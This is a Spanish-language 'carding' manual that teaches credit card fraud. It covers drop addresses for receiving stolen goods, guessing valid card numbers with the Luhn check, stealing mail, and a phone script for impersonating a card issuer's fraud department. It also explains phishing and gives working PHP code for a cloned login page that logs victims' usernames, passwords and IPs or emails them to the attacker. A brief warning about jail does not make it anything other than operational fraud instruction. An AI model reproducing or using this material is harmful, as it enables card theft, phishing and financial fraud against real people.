Sper manual de carding
Contenido
1.-Todo sobre carding
2.-a) Estructura de las Tarjetas de Crdito
3.-b) Tengo el numero que hago?
4.-c)Ingeniera social para conseguir datos de Tarjetas de Crdito
5.-d) Scams y phishing para conseguir datos de Tarjetas de crdito
6.-e)a)Hacer un scam.
1.-Todo sobre Carding
Es el uso ilegitimo de las tarjetas de crdito, o de sus nmeros, pertenecientes a otras
personas. Se relaciona con el hacking, porque para conseguir nmeros de tarjetas de
crditos, una de las formas es utilizando Ingeniera Social y sobre todo nuestra
inteligencia (esto es lo ms importante)
Se debe tener mucho cuidado en hacer esto ya que nos podemos meter en muchos los.
Con nuestras tarjetas de crdito debemos ser cuidadosos ya que alguien puede leer este
documento antes que uno de ustedes y ser capaz de estafarlos.
Se puede recuperar el dinero tal vez pero para eso tendran que hablar con el
administrador del sitio donde se realizo el pago del artculo solicitando la IP de donde se
hizo la compra y luego de todo esto tenemos que demostrar que nosotros no hicimos la
compra del mismo.
El carding consiste en comprar usando la cuenta bancaria o la tarjeta crdito de otro,
esto se consigue con un poco de ingeniera social y mucha perseverancia.
Cuando alguna persona utiliza carding para comprar objetos materiales se suele utilizar
una direccin falsa con una identificacin tambin falsa, es decir todo el formulario de
compra lo llena con datos falsos.
De esta manera el comprador quedara esperando en el lugar indicado la entrega del
material como si se tratara de su residencia.
La filosofa de los carders se basa en que existe mucha gente que tiene grandes
cantidades de dinero que no cae nada mal utilizar algo de ese dinero para comprar
algunas cositas para cada uno de ellos, ya que posiblemente el dueo de la tarjeta ni se
d cuenta de esta compra que l no la hizo.
Si ustedes estn pensando en comprar por Internet programas o suscripciones y piensan
que utilizando el carding ser muy fcil pues tienen toda la razn resulta muy sencillo.
En este manual se conseguir revisar los mtodos que utilizan los carders para hacerse
de los nmeros de tarjetas y burlar las seguridades para poder comprar sin ningn tipo
�de problemas.
Tienen que saber que el robo de una tarjeta de crdito es un delito universal por lo que
puede tener causas penales muy graves si no quieres irte de paseo a la crcel no intenten
nada de esto.
Como hemos dicho antes, despus de sacar los datos de la tarjeta de crdito si vamos a
usarlos para comprar por internet se ponen direcciones falsas, las direcciones que se
ponen son las de un dromp.
Un dromp es un compaero del carding, que recibe en su casa los productos que el
carder compra.
Esto se hace para que nadie acabe en la crcel, por ejemplo, si alguien denuncia que an
comprado por internet con el dinero de su tarjeta, la polica lo primero que investigara
ser la direccin a la que se envi el producto. Entonces irn a esa direccin, y hablaran
con el propietario de la casa que ha indicado la direccin.
El no negara todo, y entonces tendrn que comprobar la IP, vern que es diferente, y no
le podrn hacer nada.
En Espaa por lo menos, ni le ponen una multa.
Al que hace todo eso se le llama dromp.
2.-a) Estructura de las Tarjetas de Crdito
Esto es importante ya que sabemos como estn formadas las tarjetas de crdito.
Los nmeros de las tarjetas se forman de 16 dgitos divididos en 4 grupos de 4 dgitos
pueden tener valores del 0 al 9 los primeros 4 dgitos sirven para determinar el banco.
Hagamos un ejemplo de la creacin de un nmero de tarjeta:
Numero de tarjeta: 5180 2345 3942 8765
Las posiciones impares son:
5
8
2
4
3
4
8
6
Luego de esto se multiplica los 2 primeros dgitos entre si luego los siguientes y asi
sucesivamente para que sea mas claro quedara de la siguiente forma:
5*8=40
2*4=8
3*4=12
8*6=48
�Si tenemos cifras mayores a 9 se suma los nmeros es decir las cifras reducidas 8+5=13
entonces
1+3=4
En el ejemplo quedara as:
5*8=40 4+0=4
2*4=8 8
3*4=12 1+2=3
8*6=48 4+8=12 1+2=3
En resumen los nmeros que nos quedan son:
4
8
3
3
Luego de esto suma los nmeros pares que descartamos al principio y smalos con estos
el resultado debe ser un nmero mltiplo de 10 para que el nmero sea correcto:
4+8+3+3+1+0+3+5+9+2+7+5=50
Si no nos diera un nmero correcto como va a suceder en la mayora de los casos lo
recomendable es dejar el ultimo casillero libre y jugar con este digito hasta que nos de
un numero valido.
Esta es una de las formas de conseguir un nmero de tarjeta de crdito es decir
adivinando a ver si nos sale otra puede ser esperar pacientemente el fin de mes el
momento que llega el corte de pago de la tarjeta del vecino nos robamos su
correspondencia y listo ah tenemos un numerito.
Otra de las formas es creando un portal de Internet donde ponemos artculos a la venta
se explicara esto ms adelante.
3.-b) Tengo el numero que hago?
El momento de realizar una compra en lnea nos solicitan una serie de datos pero los
mas importantes es decir los que nunca faltan son estos:
Nombre.
Numero de Cuenta.
Fecha de Expiracin.
Tipo de tarjeta.
Numero de verificacin
�Estos datos son muy fciles de conseguir (a veces)
El nombre es el de la victima sencillo de conseguir, el nmero de su tarjeta es un poco
ms complicado pero hay formas revisando su correspondencia por ejemplo
La fecha de expiracin la podremos conseguir hacindonos pasar por el banco con los
datos que ya conocemos podremos decirle que vamos ampliar su cupo por sus pagos
puntuales o cualquier cosa esto ya queda a su imaginacin lo que si nos queda claro es
que conseguir estos datos resulta sumamente sencillo.
Tipo de Tarjeta ya lo sabemos ya revisamos su correspondencia revisar paso uno
Para reconocer el tipo de tarjeta se puede utilizar, el primer digito de la tarjeta que nos
indica el tipo de la misma.
Si el primer nmero es....
3 ->American Express (15 dgitos)
4 ->VISA (13 o 16 dgitos)
5 ->Mastercard (16 dgitos)
6 ->Discover (16 dgitos)
Con estos datos ya se puede comprar algo en lnea generalmente los carders realizan una
compra de algn software pequeo que sea de descarga o una subscripcin para ver
pornografa esto lo hacen para probar si la tarjeta funciona o no .
Si el momento de la compra nos solicitaran mas datos ya saben que hacer es mas creo
que al momento de revisar su correo no tendrn estos datos tendrn muchos mas.
4.-c) Ingeniera Social para conseguir datos de Tarjetas de
Crdito
Para conseguir nmeros y datos de una tarjeta de crdito siempre esta la ingeniera
social.
Por ejemplo, tu consigues el numero de telfono de algn cliente de algn banco, le
llamas y le dices:
"Buenas tardes, soy Antonio Martinez de la seccin fraudes de Master Card , hemos
detectado un posible uso fraudulento de su tarjeta, por lo que necesitamos que nos
indique todos los datos de la misma, para realizar una comprobacin"
jeje, siempre hay alguien que pica en esto.
Para verificar si la tarjeta es til se puede hacer una llamada a la entidad bancaria de
donde pertenece la tarjeta nos hacemos pasar como dueos de la tarjeta indicando que
quisimos hacer una compra y nuestra tarjeta fue rechazada para verificar si hablan con
el dueo de la tarjeta pedirn verificar unos datos harn preguntas sencillas como cual
es el numero de tarjeta, numero de verificacin esto ya no es problema para nosotros ya
�que tenemos toda la informacin que conseguimos antes al hacernos pasar como
empleados de la entidad que emite la tarjeta.
La informacin que conseguimos aqu es fundamental ya que podremos saber si la
tarjeta es principal o es un adicional si es de uso nacional o mundial cuanto es el cupo
que tiene la misma, etc.
Las compras que suelen hacer los carders son mediante Internet o telefnicamente no de
montos muy altos para que no se pida confirmacin al dueo de la tarjeta y para no
levantar sospechas
El carder es muy cuidadoso no puede andar gritando al mundo sus hazaas porque el es
un ladrn el est robando, si hace un pedido de un articulo no puede pedir otro y otro
artculo a la misma direccin tiene que ir rotando de lugares.
Generalmente si el encargo est en la oficina de correos el ira cuando no haya nadie si
estuviera mucha gente preferir no arriesgarse y ni siquiera acercarse ms al lugar ya
que podra resultar peligroso para l.
Un carder nunca pide algo gigante no se comprara un carro para que le traigan por DHL
ni nada extremadamente caro (un collar de oro de 18 kilates) tampoco algo muy baratito
pero estara bien que se compre una palm ultimo modelo ese es un buen carder.
El problema que se podra presentar es que el carder cada vez quiere comprar algo mas
y no para se vuelve ms adicto por el riesgo y por qu se est comprando buenas cositas
pero no se da cuenta que tal vez lo tiene fichado y prximamente le haga una visita la
polica.
ADVERTENCIA: Recordad lo del dromp
5.-d) Scams y Phishing para conseguir datos de una Tarjeta de
Crdito
Tambin se puede recurrir al Scam y al Phishing para conseguir datos de una tarjeta de
crdito.
El scam es una copia de una web utilizado para sacar contraseas... y en este caso para
sacar datos de tarjetas de crdito.
El phishing es como la ingeniera social, consiste en enviar un email a la vctima, como
si fueras su tpico banco del k el tanto se fa, y engaarle para que se meta en tu scam.
Por ejemplo, yo ago un scam de un banco, donde haya un formulario donde los clientes
metan los datos de sus tarjetas y puedan mover su dinero o hacer lo que quieran. Pues
bien una vez hecho el scam (ya explicare como) me ago pasar por ese banco enviando
un email a la victima dicindole que por no seque razones tiene que rellenar ese
formulario. Si la vctima se lo cree, se meter en el scam, y los datos nos los quedamos
nosotros.
�6.-d)a)Hacer un scam
Hacer un scam es lo ms sencillo que hay en la vida.
Tan solo tienes que ir a la web que quieres scammear y en la barra de herramientas del
explorer (o de mozilla, o de opera xD) klikas en ver/codigo fuente.
Lo pegas en un bloc de notas.
Despus de esto haces los siguientes pasos:
la siguiente informacion se la he cojido a Facu.Hack
(http://hackxcrack.es/foro/index.php?topic=6280.0)
1. Miramos el cdigo de la web que queremos clonar.
2. Cambiamos la parte del code del logeo y ponemos algo as:
<form method="GET" action="2.php">
<input type="text" name="user" size="20"><p>
<input type="text" name="pass" size="20"><p>
<input type="submit" value="Enviar" name="send">
</form>
Eso lo que hace es simular un login.
Donde dice "laweb.php" ponemos la web donde vamos a
montar el script .php donde se guardarn las passwords.
SCRIPT PARA GUARDAR UN ARCHIVO DE TEXTO:
<?
$user = strip_tags($_GET['user']);
$pass = strip_tags($_GET['pass']);
$ip = $_SERVER['REMOTE_ADDR'];
$todo = "User: ".$user." | Pass: ".$pass." | IP: ".$ip." \n";
$open = fopen("logins.txt","a");
fwrite($open,$todo);
fclose($open);
?>
<SCRIPT LANGUAGE="JavaScript">
location.href='www.lawebprincipal.com';
</SCRIPT>
SCRIPT PARA QUE TE LLEGE EMAIL
<?
$tumail = "[email protected]";
$user = strip_tags($_GET['user']);
$pass = strip_tags($_GET['pass']);
$ip = $_SERVER['REMOTE_ADDR'];
$todo = "User: ".$user." | Pass: ".$pass." | IP: ".$ip."";
�mail($tumail,"Victima ".$user." - xD",$todo);
?>
Ahora me explico un poco para los que no lo an entendido.
Para que te lleguen los datos de la victima hay dos maneras.
Hay una, que es en el mismo scam, en un documento de texto.
Vamos que al scam tienes que subir: el login y robados.txt
En robados.txt se quedaran los datos de la vctima.
Y otra cosa que puedes hacer es que los datos de la victima te lleguen a tu email, para
eso copias el script del email y asta listo.
Bueno pos despus de terminar tu scam solo tienes que hacer el phishing.
Para eso hazte una cuenta de email tipo esta: [email protected] o algo
parecido, y en el cuerpo del mensaje utiliza la ingeniera inversa.
y recordar que a la de comprar algo hay k utilizar el dromp.
